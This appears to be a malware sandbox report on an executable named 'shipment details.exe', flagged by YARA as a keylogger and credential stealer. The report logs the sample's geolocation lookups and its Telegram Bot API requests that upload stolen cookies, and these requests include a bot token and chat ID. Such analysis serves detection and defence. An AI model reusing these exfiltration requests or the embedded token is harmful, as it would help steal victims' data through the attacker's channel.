2024-10-08 16:21:08 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70800 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xL3qUzP94h2F6Jonl4urnx0%2B18ncIC10KqQ0PbZYx9I63qHN%2FLgQnL7jq11PgPfLco7Tg9cZQfVVuceMVMrpFBQQ6Ll7KbvmbBDkQQkRhU0v5gl9pO%2BflmVtYhIoSSS2BRGM%2FOI2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf776553fde17a5-EWR
2024-10-08 16:21:08 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:09 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 16:21:09 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:09 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70801 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6IKiQA0%2BIs7%2FT7zV3chR9T%2F9CjSdPVirxTL15e9yKHdORH5zNl7AGRZf8NWMITKxVYj3TtKBA29FsViDFvmxN%2FJEDvnCHhnFhHz8Sbk01H9RCfJ2B8ZWsMCjB7JI483gCzfx5P7B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf7765d0c930f5d-EWR
2024-10-08 16:21:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:10 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 16:21:10 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70802 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PVKOcI%2F7qSfhZEgs507D40KfLonzdl75z2UYg6niN6R03aX4gzejoklOBqRCU74Z2TOOTq3aXNA%2FJblwrfcjfhRM3XPNZSXmhssddAjYTKSU%2BKYiC29t9IyotzSjI7PUk4WyNqQj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf776664a2d42f1-EWR
2024-10-08 16:21:10 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:11 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 16:21:12 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70804 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBnpYAA1Xsg%2FmAoIDH5cqjReNyeZNBvqeeyjgYlbGwb17%2F%2BSaNDiT4i3G9lPmTzp0VCdKOkWRe0akMfdp7Tu03kypQLbetHr3OttfKpYBPS01qrYBVRGLr71MFUNT6JF0J097Ty2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf7766e4c804345-EWR
2024-10-08 16:21:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49719	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:14 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 16:21:14 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70806 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9nClVfN1pfnTeJwsQ6fsvZLrVNvNHi%2F32bSrCpaNPHcbFgIfnHA8WiIJH5%2F4A7X7x1m29pnwTUvoZE1%2BkqWZlLg7eZmvsQ8OFWoM4eeVDUILiCU2CyKoSTEjhHQ2OQ4gu7UWz5R"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf7767c19494297-EWR
2024-10-08 16:21:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:16 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 16:21:16 UTC	688	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70808 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CCoaGGYaGyJMm%2FAZ%2BpWDTx2yNjPD%2Fv5aa%2FN5BUIxeEWbHkhiTrul3LnX%2FryF6oR3%2BMXVe252gO1qSDP34VaROeAYRSq5P8GpTnC%2FB2I%2FAHfROBw%2BcwUZ41BYCddUPeiAftVt5016"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf77687c843434a-EWR
2024-10-08 16:21:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:18 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 16:21:18 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70810 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k3pmcnnVVlnbuGzfFRpKEmU2c8d69ZxRFYO7kjh66QEk9nrp%2FAAPoruIwl%2Fj87ptj0KegfvFfV4e6XrPrjNfmr1qRGepwVxeJa4Jb75Xwbe4149S6YdlC8%2BJ%2B3hnuV%2BdMPRDnzDb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf77695992a42e7-EWR
2024-10-08 16:21:18 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49725	188.114.97.3	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:19 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 16:21:19 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 16:21:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70811 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x0CtX3p%2Fuk9rq1l%2BaK4IMJVWZFYzOwcXKptdptSqv8BjKi8dpvXZXuagdR8xmZd8KUa9S6BxeAVPSGlcvwbezYjwXCCs7TItkcYWV5eET4oa33SddBnGwG5B%2F2QfqXuj%2F%2FuJs6K3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf7769d48234362-EWR
2024-10-08 16:21:19 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 16:21:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49727	149.154.167.220	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:20 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-08 16:21:20 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 08 Oct 2024 16:21:20 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-08 16:21:20 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	62359	149.154.167.220	443	4788	C:\Users\user\Desktop\shipment details.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 16:21:26 UTC	352	OUT	POST /bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce87960e4dfa2 Host: api.telegram.org Content-Length: 1257
2024-10-08 16:21:26 UTC	1257	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 38 37 39 36 30 65 34 64 66 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 37 31 33 34 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 38 2f 31 30 2f 32 30 32 34 20 Data Ascii: --------------------------8dce87960e4dfa2Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:571345Date and Time: 08/10/2024
2024-10-08 16:21:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 08 Oct 2024 16:21:27 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-08 16:21:27 UTC	520	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 35 36 32 37 31 33 39 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 31 30 31 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6f 6f 6f 63 74 6f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 31 33 35 38 36 39 36 36 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 45 57 53 54 41 4e 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 68 65 6c 69 4b 6f 6b 6f 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 34 30 34 34 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f Data Ascii: {"ok":true,"result":{"message_id":44,"from":{"id":7556271394,"is_bot":true,"first_name":"1010","username":"ooooctobot"},"chat":{"id":2135869667,"first_name":"NEWSTAND","username":"PheliKoko","type":"private"},"date":1728404487,"document":{"file_name":"Coo

Target ID:	0
Start time:	12:21:02
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\shipment details.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipment details.exe"
Imagebase:	0x720000
File size:	488'448 bytes
MD5 hash:	606686AD6A08EBE2CC694B5618CFAAB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:21:02
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\shipment details.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipment details.exe"
Imagebase:	0xbc0000
File size:	488'448 bytes
MD5 hash:	606686AD6A08EBE2CC694B5618CFAAB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
